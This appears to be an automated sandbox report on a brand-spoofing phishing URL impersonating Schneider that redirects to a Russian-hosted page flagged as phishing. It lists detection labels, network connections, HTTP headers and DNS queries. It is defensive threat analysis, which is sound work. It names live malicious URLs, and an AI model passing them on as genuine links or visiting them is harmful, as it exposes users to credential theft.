Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/

Overview

General Information

Sample URL:http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/
Analysis ID:1562764
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
AI detected suspicious URL

Classification

  • System is w10x64
  • chrome.exe (PID: 2136 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 2484 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1824,i,5043773792219058669,17741932396626826224,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6336 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt/" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://8a6b7.qvzjymmm.ru/favicon.icoAvira URL Cloud: Label: phishing
Source: https://8a6b7.qvzjymmm.ru/O3YCEI/Avira URL Cloud: Label: phishing

Phishing

barindex
Source: EmailJoe Sandbox AI: AI detected Brand spoofing attempt in URL: http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
Source: EmailJoe Sandbox AI: AI detected Typosquatting in URL: http://schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
Source: https://8a6b7.qvzjymmm.ru/O3YCEI/#BHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49789 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49794 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49806 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 199.232.214.172
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /O3YCEI/ HTTP/1.1Host: 8a6b7.qvzjymmm.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8a6b7.qvzjymmm.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8a6b7.qvzjymmm.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8a6b7.qvzjymmm.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://8a6b7.qvzjymmm.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/crypto-js/4.1.1/crypto-js.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.6.0.min.js HTTP/1.1Host: code.jquery.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/ HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://8a6b7.qvzjymmm.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/e4025c85ea63/api.js HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8e856a3e49b28c06&lang=auto HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/e00u8/0x4AAAAAAA0rtdv_xNXYa5Om/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Wb5MDaLXKmrWLk9&MD=h3V7Md7x HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: 8a6b7.qvzjymmm.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://8a6b7.qvzjymmm.ru/O3YCEI/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImgyWmdXNHpUYWZIRmo0YXNId1paT3c9PSIsInZhbHVlIjoiMldPai9UVzZ6cEZrUTBzbC9zNWhsUHFOYnlCelZVaFh5SHQ2amdEaTl2ckI5UjN6N1JveGk3S1k4TEpURTlQZDlrbW9tMG1LVXVRc3c4VVk4SGVKVHcxc2RLQUNML2ZuM0Qyb1pscWNyWG9YWW4yUG5Gbjk0em9OVVFZYzNhMWUiLCJtYWMiOiIzZGY5YjRlMWU2Njc4MjY1MTk2YTNhNmZiMDhhNTQ0ZDkzMzdiNmMxYzk2Y2M3N2ExYjcwN2I0MzI0MzlkNGY3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImovN0xuNkFsMkpTRTl6OGpTVGhOeEE9PSIsInZhbHVlIjoidFAwc2FBYkwvbStLYlZHNnM2dlBRRUhyZG5RMnQ3bTdQVHJjV1Y3NVFrNWZDczI2WkhMVDFDMzlPWWJqcndWREpiMFBVNmE0eDlnVE9sL0t6cHE1aWJ0cFhEZVA0RmY0V0tVejRmMHp2a3IxaWJlcUV6Q2lpY2RKNnZld3JtNnMiLCJtYWMiOiI5ODY0ZDRkMzgxMGI4MjIwZmIwMjE0OWMyOGU2NDA1NThmNDM4MjIyMTgyNzgzYjJjMWFjZjgzYzgzYzEyMDZkIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=Wb5MDaLXKmrWLk9&MD=h3V7Md7x HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.ptConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: schneider.com.staffrecords-2024xsowi-dxeobyoji.aluminiosbarros.pt
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: 8a6b7.qvzjymmm.ru
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
